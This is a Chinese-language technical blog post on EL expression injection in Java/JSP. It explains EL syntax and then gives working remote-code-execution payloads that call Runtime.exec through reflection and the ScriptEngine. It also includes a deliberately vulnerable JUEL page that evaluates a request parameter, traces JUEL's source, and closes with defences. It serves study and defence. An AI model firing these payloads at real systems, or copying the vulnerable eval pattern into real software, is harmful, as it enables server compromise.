EL表达式注入源码分析

type

Post

status

Published

date

Feb 22, 2023

slug

summary

EL简介

EL（Expression Language）是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言，它提供了在 JSP 中简化表达式的方法，让Jsp的代码更加简化

EL表达式主要功能如下：

获取数据：EL表达式主要用于替换JSP页面中的脚本表达式，以从各种类型的Web域中检索Java对象、获取数据（某个Web域中的对象，访问JavaBean的属性、访问List集合、访问Map集合、访问数组）；

执行运算：利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算，以在JSP页面中完成一些简单的逻辑运算，例如${user==null}；

获取Web开发常用对象：EL表达式定义了一些隐式对象，利用这些隐式对象，Web开发人员可以很轻松获得对Web常用对象的引用，从而获得这些对象中的数据；

调用Java方法：EL表达式允许用户开发自定义EL函数，以在JSP页面中通过EL表达式调用Java类的方法；

基本语法

EL语法

在JSP中访问模型对象是通过EL表达式的语法来表达。所有EL表达式的格式都是以${}表示。例如，${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时，则默认在page范围查找，然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量，例如：${ pageScope. userinfo}表示访问page范围中的userinfo变量。

简单地说，使用EL表达式语法：${EL表达式}

其中，EL表达式和JSP代码等价转换。事实上，可以将EL表达式理解为一种简化的JSP代码。

扩展JSP代码的写法总结：

JSP表达式：<%=变量或表达式>

向浏览器输出变量或表达式的计算结果。

JSP脚本：<%Java代码%>

执行java代码的原理：翻译到_jspService()方法中。

JSP声明：<%!变量或方法%>

声明jsp的成员变量或成员方法。

JSP注释：<%!--JSP注释--%>

用于注释JSP代码，不会翻译到Java文件中，也不会执行

[ ]与.运算符

EL表达式提供.和[]两种运算符来存取数据。

当要存取的属性名称中包含一些特殊字符，如.或-等并非字母或数字的符号，就一定要使用[]。例如：${user.My-Name}应当改为${user["My-Name"]}。

如果要动态取值时，就可以用[]来做，而.无法做到动态取值。例如：${sessionScope.user[data]}中data 是一个变量。

变量

EL表达式存取变量数据的方法很简单，例如：${username} 。它的意思是取出某一范围中名称为username的变量。因为我们并没有指定哪一个范围的username，所以它会依序从Page、Request、Session、Application范围查找。假如途中找到username，就直接回传，不再继续找下去，但是假如全部的范围都没有找到时，就回传""。EL表达式的属性如下

EL表达式存取变量数据的方法很简单，例如：${username}。它的意思是取出某一范围中名称为username的变量。因为我们并没有指定哪一个范围的username，所以它会依序从Page、Request、Session、Application范围查找。假如途中找到username，就直接回传，不再继续找下去，但是假如全部的范围都没有找到时，就回传""。EL表达式的属性如下：

属性范围在EL中的名称	ㅤ
Page	PageScope
Request	RequestScope
Session	SessionScope
Application	ApplicationScope

JSP表达式语言定义可在表达式中使用的以下文字：

文字	文字的值
Boolean	true 和 false
Integer	与 Java 类似。可以包含任何整数，例如 24、-45、567
Floating Point	与 Java 类似。可以包含任何正的或负的浮点数，例如 -1.8E-45、4.567
String	任何由单引号或双引号限定的字符串。对于单引号、双引号和反斜杠，使用反斜杠字符作为转义序列。必须注意，如果在字符串两端使用双引号，则单引号不需要转义。
Null	null

操作符

JSP表达式语言提供以下操作符，其中大部分是Java中常用的操作符：

术语	定义
算术型	+、-（二元）、*、/、div、%、mod、-（一元）
逻辑型	and、&&、or、双管道符、!、not
关系型	==、eq、!=、ne、<、lt、>、gt、<=、le、>=、ge。可以与其他值进行比较，或与布尔型、字符串型、整型或浮点型文字进行比较。
空	empty 空操作符是前缀操作，可用于确定值是否为空。
条件型	A ?B :C。根据 A 赋值的结果来赋值 B 或 C。

隐式对象

JSP表达式语言定义了一组隐式对象，其中许多对象在 JSP scriplet 和表达式中可用：

术语	定义
pageContext	JSP页的上下文，可以用于访问 JSP 隐式对象，如请求、响应、会话、输出、servletContext 等。例如，`${pageContext.response}`为页面的响应对象赋值。

此外，还提供几个隐式对象，允许对以下对象进行简易访问：

术语	定义
param	将请求参数名称映射到单个字符串参数值（通过调用 ServletRequest.getParameter (String name) 获得）。getParameter (String) 方法返回带有特定名称的参数。表达式`${param . name}`相当于 request.getParameter (name)。
paramValues	将请求参数名称映射到一个数值数组（通过调用 ServletRequest.getParameter (String name) 获得）。它与 param 隐式对象非常类似，但它检索一个字符串数组而不是单个值。表达式 `${paramvalues. name}` 相当于 request.getParamterValues(name)。
header	将请求头名称映射到单个字符串头值（通过调用 ServletRequest.getHeader(String name) 获得）。表达式 `${header. name}` 相当于 request.getHeader(name)。
headerValues	将请求头名称映射到一个数值数组（通过调用 ServletRequest.getHeaders(String) 获得）。它与头隐式对象非常类似。表达式`${headerValues. name}`相当于 request.getHeaderValues(name)。
cookie	将 cookie 名称映射到单个 cookie 对象。向服务器发出的客户端请求可以获得一个或多个 cookie。表达式`${cookie. name .value}`返回带有特定名称的第一个 cookie 值。如果请求包含多个同名的 cookie，则应该使用`${headerValues. name}`表达式。
initParam	将上下文初始化参数名称映射到单个值（通过调用 ServletContext.getInitparameter(String name) 获得）。

除了上述两种类型的隐式对象之外，还有些对象允许访问多种范围的变量，如 Web 上下文、会话、请求、页面：

术语	定义
pageScope	将页面范围的变量名称映射到其值。例如，EL 表达式可以使用`${pageScope.objectName}`访问一个 JSP 中页面范围的对象，还可以使用`${pageScope .objectName. attributeName}`访问对象的属性。
requestScope	将请求范围的变量名称映射到其值。该对象允许访问请求对象的属性。例如，EL 表达式可以使用`${requestScope. objectName}`访问一个 JSP 请求范围的对象，还可以使用`${requestScope. objectName. attributeName}`访问对象的属性。
sessionScope	将会话范围的变量名称映射到其值。该对象允许访问会话对象的属性。例如：`${sessionScope. name}`
applicationScope	将应用程序范围的变量名称映射到其值。该隐式对象允许访问应用程序范围的对象。

详细语法就不写咯~可参考：https://www.runoob.com/jsp/jsp-expression-language.html

JSP中启动/禁用EL表达式

全员禁用EL表达式

web.xml中进入如下配置：


<jsp-config>
	<jsp-property-group>
		<url-pattern>*.jsp</url-pattern>
		<el-ignored>true</el-ignored>
	</jsp-property-group>
</jsp-config>

单文件禁用EL表达式

JSP2.0中默认的启用EL表达式。在JSP文件中可以有如下定义：


<%@ page isELIgnored="true" %>

该语句表示是否禁用EL表达式，TRUE表示禁止，FALSE表示不禁止。

EL表达式注入攻击

EL表达式注入漏洞和SpEL、OGNL等表达式注入漏洞是一样的漏洞原理的，即表达式外部可控导致攻击者注入恶意表达式实现任意代码执行。

一般的，EL表达式注入漏洞的外部可控点入口都是在Java程序代码中，即Java程序中的EL表达式内容全部或部分是从外部获取的。

常用payload：


//对应于JSP页面中的pageContext对象（注意：取的是pageContext对象）
${pageContext}

//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

//文件头参数
${header}

//获取webRoot
${applicationScope}

//执行命令1
${pageContext.setAttribute("a", Runtime.getRuntime().exec("touch /tmp/123456"))}

//执行命令2
${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

//执行命令3
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

JSP内嵌EL表达式注入

该EL表达式直接在JSP页面中执行，访问则触发任意代码执行


<%@ page contentType="text/html;charset=UTF-8" language="java" isELIgnored="false" %>
<html>
    <head>
        <title>Title</title>
    </head>
    <body>
        name=${param["test"]}
        <p>${header["cmd"]}</p>
        ${pageContext.setAttribute("a", Runtime.getRuntime().exec("touch /tmp/123456"))}
    </body>
</html>

（效果图忘记去水印就不放了）

但是在实际场景中，是几乎没有也无法直接从外部控制JSP页面中的EL表达式的，而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。

JUEL实现EL表达式注入

上面说到单纯依靠JSP页面从外部控制、执行EL表达式是不可行的，那么接下来将引入JUEL实现

JUEL简介

EL曾经是JSTL的一部分。然后，EL进入了JSP 2.0标准。现在，尽管是JSP 2.1的一部分，但EL API已被分离到包javax.el中，并且已删除了对核心JSP类的所有依赖关系。换句话说：EL已准备好在非JSP应用程序中使用！也就是说，现在EL表达式所依赖的包javax.el等都在JUEL相关的jar包中。

JUEL（Java Unified Expression Language）是统一表达语言轻量而高效级的实现，具有高性能，插件式缓存，小体积，支持方法调用和多参数调用，可插拔多种特性。

更多参考官网：http://juel.sourceforge.net/

环境必备

需要的jar包：juel-api-2.2.7、juel-spi-2.2.7、juel-impl-2.2.7

引用在JSP不会引用或引用报错可参考以下方式：

报错：only a type can be imported XXX resolves to package
将以下三个jar包，解压将需要的类放置在webapps\xxx\WEB-INF\classes目录下
juel-api-2.2.7.jar
juel-impl-2.2.7.jar
juel-spi-2.2.7.jar    

触发代码如下：


<%@ page contentType="text/html;charset=UTF-8" language="java" isELIgnored="false" %>
<%@ page import="de.odysseus.el.ExpressionFactoryImpl" %>
<%@ page import="de.odysseus.el.util.SimpleContext" %>
<%@ page import="javax.el.ExpressionFactory" %>
<%@ page import="javax.el.ValueExpression" %>
<%@ page import="java.lang.*" %>
<%@ page import="java.io.*" %>

<%
    ExpressionFactory expressionFactory = new ExpressionFactoryImpl();
    SimpleContext simpleContext = new SimpleContext();
    String exp = request.getParameter("exp");
    ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class);
    System.out.println(valueExpression.getValue(simpleContext));
%>
<html>
    <head>
        <title>Title</title>
    </head>
    <body>
    hello!
    </body>
</html>

利用反射机制

payload如下：


exp=${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'touch+/tmp/success')}

（效果图忘记去水印就不放了）

利用ScriptEngine调用JS引擎

payload如下：


exp=${''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("java.lang.Runtime.getRuntime().exec('touch+/tmp/123123')")}

（效果图忘记去水印就不放了）

除以上利用方式以外，更多表达式注入案例可参考：https://www.cnblogs.com/zzhoo/p/15401216.html

EL表达式源码分析

为方便分析，我们直接把上述JSP关键代码挪到IDEA里，从执行表达式的入口getVaule()做断点分析

从百草园到三味书屋

this.node所属类的是de.odysseus.el.tree.impl.ast.AstEval，this.child所属类是de.odysseus.el.tree.impl.ast.AstMethod，因此从TreeValueExpression.getVaule() → AstNode.getVaule() → AsMethod.eval()

在AsMethod.eval()中，将解析payload中的表达式。从表达式中解释出首个方法“根方法”，你也可以理解成”调用方“或者“最左侧”的方法（这部分后面将重复遍历表达式中的方法至结束）

跟进到context.getELResolver().invoke()，将反射调用解析器对象javax.el.CompositeELResolver去解析EL表达式中的方法，而params正是payload中各方法中的参数

持续跟进，接着从((ELResolver)this.resolvers.get(i)).invoke()跟进到BeanELResolver.invoke()中，在其中将调用BeanELResolver.getExpressionFactory方法去创建、初始化de.odysseus.el.ExpressionFactoryImpl即我们给的EL表达式解析器对象expressionFactory

遍历解析表达式内容

de.odysseus.el.tree.impl.ast.AstMethod()逐个逐个解析表达式中的方法部分

de.odysseus.el.tree.impl.ast.AstParameters.eval() 逐个逐个解析表达式中的方法中的参数部分

直至将EL表达式解析完成

防御方法

尽量不使用外部输入的内容作为EL表达式内容；

若使用，则严格过滤EL表达式注入漏洞的payload关键字；

如果是排查Java程序中JUEL相关代码，则搜索如下关键类方法：


javax.el.ExpressionFactory.createValueExpression()
javax.el.ValueExpression.getValue()

如果是排查Java调用序列，则监控如下EL反射类方法：


javax.el.BeanELResolver.invoke()